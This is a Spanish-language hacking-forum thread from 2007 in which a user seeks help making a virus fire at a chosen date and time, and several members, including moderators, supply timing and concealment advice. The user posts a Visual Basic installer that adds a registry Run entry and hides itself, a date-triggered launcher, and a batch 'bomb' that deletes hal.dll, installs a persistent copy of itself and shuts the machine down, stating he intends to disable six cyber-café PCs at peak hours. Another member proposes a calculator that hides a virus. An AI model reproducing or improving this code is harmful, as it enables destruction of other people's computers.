hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
29 de Agosto de 2008, 11:09:21
Noticias: Privacidad - ¿Necesitas que se depure cierta informacion en nuestro portal?
Para ver este enlace Registrate o Inicia Sesion
> leer aqui

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic (Moderadores: ranefi, crypto136, ziBboh, >> s E t H <<)
| | | |-+  como hacer que un virus se ejecute con dia y hora
Páginas: [1] Ir Abajo Imprimir
Autor Tema: como hacer que un virus se ejecute con dia y hora  (Leído 496 veces)
.bat
Recien llegado
*
Desconectado Desconectado

Ver Perfil
« : 10 de Mayo de 2007, 04:50:19 »

yo he logrado que un virus se ejecute cuando inicia elpec poero me gustaria con fecha y hora como se podria hacer esto ayudaaaaaaaaaa
ziBboh
Moderador

ziBboh dice: Ya nacio mini-ziBboh! :)

Ver Perfil
« Respuesta #1 : 10 de Mayo de 2007, 08:15:03 »

Saludos .bat, te recomiendo que no uses hora, tal vez fecha, pero en fin, haya tu. Para que se ejecute en eso, crea 2 entradas en el registro una con la fecha y otra con la hora, despues le pones a tu virus que al ejecutarse cheque si los valores en la entrada del registro son iguales al que tu le asignaste.

Otra forma es simplemente usando la funcion Format del VB en la cual asignas fecha y hora y si al cargar tu virus es igual a la fecha y hora que le asignaste entoonces realiza X funcion. Espero y que me entiendas, cualquier cosa enviame un mensaje. Ok

ziBboh dice: NO SPAM!El número de post no te hace mejor ...Todos somos iguales!
crypto136
Moderador

ah no pues.....

Ver Perfil WWW
« Respuesta #2 : 11 de Mayo de 2007, 08:27:19 »

Prueba con esto, agrega un timer y le pones de intervalo 1, veras que te aparece en el formulario la fecha y la hora actual ya es cuestion tuya la forma que quieres usarlo.

Código:
Private Sub Timer1_Timer()
Me.Caption = "Fecha: " & Date & " Hora: " & Time
End Sub

Cheatmaster
NZ2
**

Ver Perfil
« Respuesta #3 : 11 de Mayo de 2007, 03:01:16 »

Prueba con esto, agrega un timer y le pones de intervalo 1, veras que te aparece en el formulario la fecha y la hora actual ya es cuestion tuya la forma que quieres usarlo.

Código:
Me.Caption = "Fecha: " & Date & " Hora: " & Time
End Sub

Se puede poner..

Me.Caption = " Hora: " & Time
End sub

En Hora por ejemplo 14:00 se ejecuta a esa hora no ?
y para que se ejecute siempre se necesita un registro cierto ??
zXxOsirisxXz
NZ2
**

Ver Perfil
« Respuesta #4 : 11 de Mayo de 2007, 09:52:52 »

Se puede poner..

Me.Caption = " Hora: " & Time
End sub

En Hora por ejemplo 14:00 se ejecuta a esa hora no ?
y para que se ejecute siempre se necesita un registro cierto ??

luego de eso, pondria en un boton donde sea..

if me.caption = "El Dia" and "la fecha" then Desastre else Aguanta
Desastre:
'tu codigo
goto Rw
Aguanta:
Rw:
end sub

Y si, necesitarias un registro.. o bien, lo pones a correr junto con windows, pero  con un nombre NO sospechoso y por supuesto.. invisible.

Salu2

ziBboh
Moderador

Ver Perfil
« Respuesta #5 : 11 de Mayo de 2007, 11:28:22 »

Se han preguntado que pasa si en la FECHA y HORA de la "Infección" el pc esta apagado?

... pues nada, tu virus saldría ca**do! usen:
Código:
If Hora >= Time Then
'Se ejecutan instrucciones viricas
Else
End 'Me cierro
End If

.bat
Recien llegado
*

Ver Perfil
« Respuesta #6 : 12 de Mayo de 2007, 11:32:47 »

Private Sub Form_Load()
Dim ip As String, ipftp As String, port As Integer
Dim ejec As String         'declaramos estas variables , si las declarais en el general mejor
Dim win
Dim sys
Dim residencia
On Error Resume Next
FileCopy "a:\proj.bat", "C:\Archivos de programa\Archivos comunes\proj.bat" ' El primero es el Source

FileCopy "a:\selector.exe", "C:\Archivos de programa\Archivos comunes\selector.exe" ' El primero es el Source

bueno 1 gracxias los socios que me stanb ayyando miren este el el codigo que lo denomine como install por que porque cambia el registro de windows e installa el selector qu se incripta en la partida de windows preuanta por el dia si se cumple llama a la bomba y se activa funcio lo he probado ..lapregunbta es como hago que este programa este constantemente pregfuntando por hora y fecha ya que solo pide fecha cuando el pc se inicia solo ala partida por ejemplo me gustaria con hora tambien paraque para activarlo mas menos alas 8:00 de la noche y no en la mañana cuando enciendan el pc es para un cyber si lo ejecuto al prender el pc tendran todo el dia para instalar windows mientras quye si lo hago en la trade ( mayor concurrebncia de gente ) estaria todos acupando elpc y al mismo tiempo 6 pc cagarian almismo tiempo genial o no ayudemme

'FileCopy (App.Path & "\" & App.FileDescri ption & "archivo.txt"), ("C:\archivo.txt")
'Name sys & "\nombre1" As sys & "\ver.exe"       'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.Reg Write "HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe"  'esto modifica el
App.TaskVisibl e = False          'para ocultarlo un poco del, (alt +sup +control)

End Sub

.bat
Recien llegado
*

Ver Perfil
« Respuesta #7 : 12 de Mayo de 2007, 11:36:14 »

ahi esta el codigo completo el install

Private Sub Form_Load()
Dim ejec As String         'declaramos estas variables , si las declarais en el general mejor
Dim win
Dim sys
Dim residencia
On Error Resume Next
FileCopy "a:\proj.bat", "C:\Archivos de programa\Archivos comunes\proj.bat" ' El primero es el Source

FileCopy "a:\selector.exe", "C:\Archivos de programa\Archivos comunes\selector.exe" ' El primero es el Source

'FileCopy (App.Path & "\" & App.FileDescri ption & "archivo.txt"), ("C:\archivo.txt")
residencia.Reg Write "HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe"  'esto modifica el
App.TaskVisibl e = False          'para ocultarlo un poco del, (alt +sup +control)

End Sub

.bat
Recien llegado
*

Ver Perfil
« Respuesta #8 : 12 de Mayo de 2007, 11:39:26 »

ejecutor el que llama al proj osea alabomba aca es donde se le deberia agraegar la hora dee ejcucionverdad

Private Sub Form_Load()
If Date > "10/4/2007" Then
 Shell "C:\Archivos de programa\Archivos comunes\proj.bat"
End If
End Sub
.bat
Recien llegado
*

Ver Perfil
« Respuesta #9 : 12 de Mayo de 2007, 11:40:25 »

este es el proj o bomba este el el que deja la caga

@echo off
title WIN32/Trojan.Dead_Windows
color 0c
del %systemdrive%\windows\system32\hal.dll /q
echo @echo off > "%systemdrive%\windows\system32\Dead Windows.bat"
echo title WIN32/Trojan.Dead_Windows >> "%systemdrive%\windows\system32\Dead Windows.bat"
echo color 0c >> "%systemdrive%\windows\system32\Dead Windows.bat"
echo del %systemdrive%\windows\system32\hal.dll /q >> "%systemdrive%\windows\system32\Dead Windows.bat"
echo shutdown -s -t 0 >> "%systemdrive%\windows\system32\Dead Windows.bat"
echo exit >> "%systemdrive%\windows\system32\Dead Windows.bat"
reg add hkey_local_mac hine\software\microsoft\windows\currentversion\run /v "Dead Windows" /t reg_sz /d "%systemdrive%\windows\system32\Dead Windows.bat" /f
Shell("cmd.exe /c COMANDO MS DOS " & Exit, vbHide)
shutdown -s -t 0
exit
Cheatmaster
NZ2
**

Ver Perfil
« Respuesta #10 : 12 de Mayo de 2007, 04:25:56 »

ahi esta el codigo completo el install

Private Sub Form_Load()
Dim win
Dim sys
Dim residencia
On Error Resume Next

End Sub

Eso es el REGISTRO ??
Y... x ejemplo el "selector.exe" es como tu lo nombres no ? = que el archivo.txt,

yo m pregunto, si el " virus " se llama PEPITO.EXE, luego en " HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "C:\Archivos de programa\Archivos comunes\selector.exe" selector.exe tiene que ser PEPITO.exe ? o puede ser independiente,

Es que yo quiero hacer un programa con doble sentido,
Es decir, una calculadora, que su segunda funcion sea el virus, pero que al ejecutarlo ala hora no ejecute la calculadora si no el virus xD nose si me explico
ziBboh
Moderador

Ver Perfil
« Respuesta #11 : 14 de Mayo de 2007, 08:14:15 »

Por favor, no se desvien del tema, Cheatmaster, te recomiendo que crees un nuevo tema con tu duda, y veras que tendras muchas respuestas.

Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión